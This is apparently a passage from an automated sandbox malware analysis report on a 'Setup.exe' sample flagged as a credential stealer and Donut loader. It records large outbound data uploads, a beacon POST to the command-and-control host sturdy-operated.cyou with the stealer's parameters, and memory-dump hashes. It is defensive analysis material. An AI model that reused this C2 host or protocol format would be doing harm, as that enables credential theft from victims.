                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: 7f 79 71 89 b1 4d 59 a7 58 78 05 35 fd 39 b3 52 94 fb 6a 32 89 22 a5 ad f1 4b 54 bb 20 81 13 dd f5 6d de d8 32 d8 52 10 ac cd d5 6c 35 78 65 b9 a5 55 99 84 52 84 80 93 94 b6 ed e2 07 08 07 d1 7b fe 6f 45 68 f8 8e 5f 57 f8 e9 43 5d b2 46 f9 55 eb 3b 8e 95 ba 9d 9f 10 58 d8 2a c4 84 58 13 37 1b c8 ba 78 6c 11 bc 53 79 ce 14 17 19 a3 79 8d 48 6c 6a 65 dc 83 fd 6e 71 a0 fd 7f 6b 05 65 25 50 dc f7 89 46 01 63 b4 2a 44 0d 3c 43 77 81 13 22 a9 7c db df c6 68 29 bc c9 fb 91 94 c7 53 f8 d1 d7 58 9b cc f4 a7 f0 70 08 e4 e4 e3 bf 88 b0 4a 00 e3 07 e3 db 20 39 f0 8d 02 1f 62 2d ae 7a ea 01 e1 07 b3 40 cc 9e 5a d2 6c 6e 45 08 3e 5f 16 8d 2e e4 ca 5c 88 1b 50 4f c3 32 08 08 b7 ae a0 32 2f 9a 9c 63 a8 01 2a 91 31 83 2e 7e e4 2c c3 bb 6f f0 5c 61 12 0a 69 be bb 4f 09 fd
                                                                        Data Ascii: yqMYXx59Rj2"KT m2Rl5xeUR{oEh_WC]FU;X*X7xlSyyHljenqke%PFc*D<Cw"|h)SXpJ 9b-z@ZlnE>_.\PO22/c*1.~,o\aiO
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: 51 86 f0 44 89 4d 82 cf b6 1d 33 f3 43 f5 5d e7 29 b8 99 2a ea 1f 21 b3 5d 43 b7 5e d8 15 1a b0 f3 cc b1 41 5c d4 b0 e8 ef d7 91 d8 26 1e 87 f5 4a 08 d7 dd c7 48 13 0f 06 3f a0 85 43 63 56 c9 dc 86 29 32 5c 1c 8c 39 2e bc 8b c5 32 98 cf f9 e6 45 ff 1e c8 83 4f e7 d6 70 de 8b 2c 65 d9 27 52 35 74 95 12 bd e9 b2 36 5f 0d b8 25 be b7 64 85 25 2a f4 3e b6 bd 6d b5 c8 87 d3 fd c5 4d 2e f2 ee 24 ee e7 86 cf cd c5 8d e8 a5 36 79 85 ea da ed a2 6d af 93 c4 8f 07 d4 f1 91 54 e0 1f 11 ac ca ab f8 5a 86 d1 21 62 4b 33 69 8c d2 ae cc 25 16 f0 e1 fa 2f ba 18 fa 93 6e 42 38 aa 8c 83 7f b6 b3 53 0c 56 c8 d6 c8 52 32 87 a8 99 eb d4 36 f1 1a 1f b4 0f 10 11 81 2e e2 f2 91 53 4a ed a9 d8 de 55 d9 fe 88 ed b2 07 01 8b 13 bb e8 a7 91 4c 14 63 e4 9a c6 7e 09 e2 f7 e7 d6 79 27
                                                                        Data Ascii: QDM3C])*!]C^A\&JH?CcV)2\9.2EOp,e'R5t6_%d%*>mM.$6ymTZ!bK3i%/nB8SVR26.SJULc~y'
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: 6b 85 a2 97 c7 06 94 c6 fa 1f 9c 74 74 81 17 9d 55 22 a7 1a 29 e6 2e c5 ea ae d1 ea c3 ad 5b 2f 78 41 e3 aa 96 bd db e5 22 f7 be 27 32 d2 ad 2c 1e 44 8c 56 dd df 1f b9 92 47 b8 d3 b7 b1 a7 36 a8 da 66 0f a6 5f dd 1e 4f 4a 64 e3 6b cc 19 44 2e 09 26 e7 41 e2 c7 94 55 4a f6 69 a4 aa e5 34 59 8a 89 88 2c ed da d6 e8 b4 43 2d 5a 5b be 75 89 aa d5 a8 92 90 d4 6c 45 ae a1 b0 c8 f2 f4 51 71 4a 10 5a 28 69 c4 c7 95 ca 45 45 26 70 ab be 3b e2 0f 7a 89 6e e3 09 69 4c da f6 1c 96 7e da 4d fb 44 e5 9f 6b c9 07 e0 50 51 9e ac f4 9c d2 c8 82 5b 68 44 07 1a 5e ea fe 4f e9 19 83 2d ba cc cf 7b 6f 8c e8 82 54 25 82 d1 ff db 00 b6 6e cd ea 95 03 ed 0f 2a 4f fc 73 49 45 72 93 e6 0b 5b d4 3b 21 c3 eb 97 54 75 31 cc 62 2b ba 16 1b b0 58 59 37 df 63 43 a8 83 1b 04 dc a2 a1 18
                                                                        Data Ascii: kttU").[/xA"'2,DVG6f_OJdkD.&AUJi4Y,C-Z[ulEQqJZ(iEE&p;zniL~MDkPQ[hD^O-{oT%n*OsIEr[;!Tu1b+XY7cC
                                                                        2024-11-23 11:13:32 UTC15331OUTData Raw: 4e 4e f6 bb 4a dc aa 4c e9 1d c9 4a 47 c3 a8 70 d4 b5 68 ba 2c 37 30 4d 58 87 a3 bf 7d cd fe 56 46 0f 04 67 c2 79 83 4c d1 24 fd 46 e8 99 75 cb 4c 6b 35 b6 5f 3d 09 4f 2d dc f4 4b 65 df b2 23 b0 c6 6f 49 ec 52 95 a5 b0 5b df 63 d9 d8 5b 6a 01 36 70 04 2a 12 05 2b 7f d9 94 73 9c 74 41 2d cc 61 e0 67 ea 7c 62 df f7 0c 2f 68 c0 e8 86 f5 06 c2 09 d0 f0 10 de b7 eb ea dd dc da f5 60 f6 5f 9b 1a 3e 19 e9 6b 64 a6 49 d8 36 38 9a b2 eb bf 29 f7 55 3b 87 dd 05 f6 cf 75 c9 91 96 dd 88 d4 5f f3 b0 04 a2 f3 78 4b 5c 68 8d 65 be 8b 13 0e 1a 76 c6 92 dc 18 70 f8 9e 83 8d 8b 22 1d fd 5f 5f 2a a5 70 b5 f1 6f 76 50 d3 94 52 fe b5 da 36 50 19 c8 1f 33 cf 74 0b ef f3 41 b6 d4 96 a1 b1 7d ff 50 b3 f6 c7 fe 24 35 86 ac a4 47 24 d2 5a f7 87 05 ec 70 87 29 2a 32 2f 5c ec d5 c2
                                                                        Data Ascii: NNJLJGph,70MX}VFgyL$FuLk5_=O-Ke#oIR[c[j6p*+stA-ag|b/h`_>kdI68)U;u_xK\hevp"__*povPR6P3tA}P$5G$Zp)*2/\
                                                                        2024-11-23 11:13:35 UTC1035INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=4bqi187oc1bm8pld77k3n426n4; expires=Wed, 19-Mar-2025 05:00:13 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2BGE4HvsgzuuXF5OtUZH%2FlUp5WWoK7zBWA1SL57MLlq5IANdkNCCYS2eVD7kjbLxv7hdazpVKAWZ5hC%2BHSUZN4zW%2ByPsGaoYhV%2BCeN%2F0kYS%2FW8D81I3S2q5D80jyz4dgowKZ6afdfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70bb063ce542f5-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2511&sent=332&recv=576&lost=0&retrans=0&sent_bytes=2850&recv_bytes=556265&delivery_rate=1132660&cwnd=223&unsent_bytes=0&cid=2d225da1b115a1c8&ts=2097&x=0"


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.649779104.21.20.1784436924C:\Users\user\Desktop\Setup.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 11:13:36 UTC268OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 81
                                                                        Host: sturdy-operated.cyou
                                                                        2024-11-23 11:13:36 UTC81OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 76 69 63 6b 26 6a 3d 26 68 77 69 64 3d 33 34 30 43 35 36 39 37 31 34 44 39 43 35 37 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                        Data Ascii: act=get_message&ver=4.0&lid=yJEcaG--vick&j=&hwid=340C569714D9C57BD7CBBD6DF28D3732
                                                                        2024-11-23 11:13:37 UTC1025INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 11:13:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=i9not086vp0pbv9ctkct8sf14v; expires=Wed, 19-Mar-2025 05:00:15 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4TFWi%2BE4YoXTR%2FD3o6MH4EtYurKyO%2FE%2BRamIlPYwl16Ck6unnXEQlEQXyqddyr%2Brk1s6XL6xx%2Fk1IBJ7IrYDWeerAdIUwfl%2BJKYCchDeNPaAh90ThVEvBvJPSWfq77ijRwrSkVfPYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e70bb1c9b4a0c74-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2203&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=985&delivery_rate=480895&cwnd=84&unsent_bytes=0&cid=f6894f5f64c53ab3&ts=705&x=0"
                                                                        2024-11-23 11:13:37 UTC54INData Raw: 33 30 0d 0a 7a 56 2f 64 35 36 76 4e 49 47 52 63 79 69 61 41 78 31 61 55 2f 33 5a 71 39 46 71 4d 4f 6f 36 6d 6d 57 37 77 34 61 43 79 42 76 36 57 41 67 3d 3d 0d 0a
                                                                        Data Ascii: 30zV/d56vNIGRcyiaAx1aU/3Zq9FqMOo6mmW7w4aCyBv6WAg==
                                                                        2024-11-23 11:13:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Click to jump to process

                                                                        Click to jump to process

                                                                        Click to dive into process behavior distribution

                                                                        Target ID:0
                                                                        Start time:06:13:03
                                                                        Start date:23/11/2024
                                                                        Path:C:\Users\user\Desktop\Setup.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                        Imagebase:0x140000
                                                                        File size:8'710'648 bytes
                                                                        MD5 hash:9AFBB0324051E70F1547C64245BC2DF2
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2387242749.000000000314E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2468502924.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Reset < >
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.2387703978.0000000003149000.00000004.00000020.00020000.00000000.sdmp, Offset: 03145000, based on PE: false
                                                                          • Associated: 00000000.00000003.2387382176.0000000003145000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_3145000_Setup.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e48047049a72e6a5e93152f1e591bd462d5b48bd0bc871dc52ee833ed27f9b7f
                                                                          • Instruction ID: 395a0f442bdcca63d0f83a6563da7a0e01562ca0ed41ae280144b287b363fa45
                                                                          • Opcode Fuzzy Hash: e48047049a72e6a5e93152f1e591bd462d5b48bd0bc871dc52ee833ed27f9b7f
                                                                          • Instruction Fuzzy Hash: 9951DB6240E7C21FE712DB7589A5691BFB0EF1B224F2A85DFC0C08E1A3D365A50BD751
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.2387703978.0000000003149000.00000004.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_3145000_Setup.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0da394bd1d6e0933c3bebd248b4a468947122a94d3076f9a2ed21ef713e0fc98
                                                                          • Instruction ID: b89ece8ff6c2708ca297fbda0ef0356cb3bf39948f7f1575929b9c072ffb70fa
                                                                          • Opcode Fuzzy Hash: 0da394bd1d6e0933c3bebd248b4a468947122a94d3076f9a2ed21ef713e0fc98
                                                                          • Instruction Fuzzy Hash: 1351DB6240E7C21FE712CB7589A5691BFB0EF1B224F2A85DFC0C08E1A3D365A50BD751